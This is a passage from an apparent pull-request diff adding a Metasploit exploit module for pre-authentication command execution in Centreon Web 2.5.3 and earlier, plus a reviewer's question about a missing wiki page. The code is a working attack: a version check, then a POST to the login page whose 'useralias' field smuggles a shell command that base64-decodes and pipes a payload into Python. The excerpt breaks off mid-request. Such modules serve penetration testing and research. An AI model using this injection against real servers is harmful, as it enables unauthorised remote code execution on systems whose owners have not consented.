modules/exploits/linux/http/centreon_useralias_exec.rb

```diff
@@ -0,0 +1,92 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Centreon Web Useralias Command Execution',
+        'Description' => %q(
+          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
+          errors.  This functionality can be abused for arbitrary code
+          execution, and can be triggered via the login screen prior to
+          authentication.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>',         # module
+            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39501' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['python'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_PYTHON,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 26 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'GET'
+      )
+      /LoginInvitVersion"><br \/>[\s]+(?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+<\/td>/ =~ res.body
+
+      if version_high && version_med && version_low && \
+         version_high.to_i <= 2 && \
+         version_med.to_i <= 5 && \
+         version_low.to_i <= 3
+        vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending malicious login')
+      send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'POST',
+        'vars_post'  =>
+        {
+          'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
```

Comment:
I see in an old google link: https://dev.metasploit.com/redmine/projects/framework/wiki/ExploitModuleDev#Illegal-Characters
Looking through the wiki, I don't see an equivalent page talking about Illegal Characters in any way.  Am I missing the link, or did that page just not get replicated? @wvu-r7